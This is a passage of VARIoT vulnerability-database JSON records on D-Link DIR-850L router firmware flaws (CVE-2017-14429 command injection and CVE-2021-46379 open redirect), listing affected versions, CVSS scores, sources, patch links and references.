"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"db": "VULHUB",
"id": "VHN-105150"
},
{
"db": "VULMON",
"id": "CVE-2017-14429"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"db": "VULHUB",
"id": "VHN-105150"
},
{
"db": "VULMON",
"id": "CVE-2017-14429"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105150"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14429"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"date": "2017-09-13T17:29:00.870000",
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31797"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105150"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2017-14429"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008110"
},
{
"date": "2023-11-17T19:58:49.280000",
"db": "NVD",
"id": "CVE-2017-14429"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Command injection vulnerability in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008110"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-566"
}
],
"trust": 0.6
}
}
VAR-202203-0928
Vulnerability from variot - Updated: 2023-12-18 11:56DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site. of D-Link Japan Co., Ltd. dir-850l An open redirect vulnerability exists in firmware.Information may be obtained and information may be tampered with. D-Link DIR850 ET850-1.08TRb03 is a router from DLink. No detailed vulnerability details are currently provided
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202203-0928",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08trb03"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30c7\u30a3\u30fc\u30ea\u30f3\u30af\u30b8\u30e3\u30d1\u30f3\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30c7\u30a3\u30fc\u30ea\u30f3\u30af\u30b8\u30e3\u30d1\u30f3\u682a\u5f0f\u4f1a\u793e",
"version": "dir-850l firmware 1.08trb03"
},
{
"model": "dir-850l",
"scope": null,
"trust": 0.8,
"vendor": "\u30c7\u30a3\u30fc\u30ea\u30f3\u30af\u30b8\u30e3\u30d1\u30f3\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "dir-850l 1.08trb03",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"db": "NVD",
"id": "CVE-2021-46379"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-46379"
}
]
},
"cve": "CVE-2021-46379",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-46379",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2022-20161",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2021-46379",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-46379",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2022-20161",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-469",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-46379",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"db": "VULMON",
"id": "CVE-2021-46379"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"db": "NVD",
"id": "CVE-2021-46379"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site. of D-Link Japan Co., Ltd. dir-850l An open redirect vulnerability exists in firmware.Information may be obtained and information may be tampered with. D-Link DIR850 ET850-1.08TRb03 is a router from DLink. No detailed vulnerability details are currently provided",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-46379"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"db": "VULMON",
"id": "CVE-2021-46379"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-46379",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "167041",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-006644",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2022-20161",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50907",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-469",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-46379",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"db": "VULMON",
"id": "CVE-2021-46379"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"db": "NVD",
"id": "CVE-2021-46379"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
]
},
"id": "VAR-202203-0928",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
}
],
"trust": 1.35
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
}
]
},
"last_update_date": "2023-12-18T11:56:26.780000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DIR850 ET850-1.08TRb03 has an unknown vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/325901"
},
{
"title": "D-Link DIR850 ET850-1.08TRb03 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=185142"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2021-46379 "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"db": "VULMON",
"id": "CVE-2021-46379"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-601",
"trust": 1.0
},
{
"problemtype": "Open redirect (CWE-601) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"db": "NVD",
"id": "CVE-2021-46379"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "http://packetstormsecurity.com/files/167041/dlink-dir850-open-redirection.html"
},
{
"trust": 2.5,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 2.5,
"url": "https://drive.google.com/file/d/1rrlwnixsheoo4smahrpkzsrzk5mwzqrf/view?usp=sharing"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46379"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50907"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2021-46379/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/601.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2021-46379"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"db": "VULMON",
"id": "CVE-2021-46379"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"db": "NVD",
"id": "CVE-2021-46379"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"db": "VULMON",
"id": "CVE-2021-46379"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"db": "NVD",
"id": "CVE-2021-46379"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"date": "2022-03-04T00:00:00",
"db": "VULMON",
"id": "CVE-2021-46379"
},
{
"date": "2023-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"date": "2022-03-04T16:15:09.383000",
"db": "NVD",
"id": "CVE-2021-46379"
},
{
"date": "2022-03-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-03-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-20161"
},
{
"date": "2022-09-09T00:00:00",
"db": "VULMON",
"id": "CVE-2021-46379"
},
{
"date": "2023-07-06T08:12:00",
"db": "JVNDB",
"id": "JVNDB-2022-006644"
},
{
"date": "2022-09-09T16:39:27.340000",
"db": "NVD",
"id": "CVE-2021-46379"
},
{
"date": "2022-05-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of D-Link Japan Co., Ltd. \u00a0dir-850l\u00a0 Open redirect vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-006644"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-469"
}
],
"trust": 0.6
}
}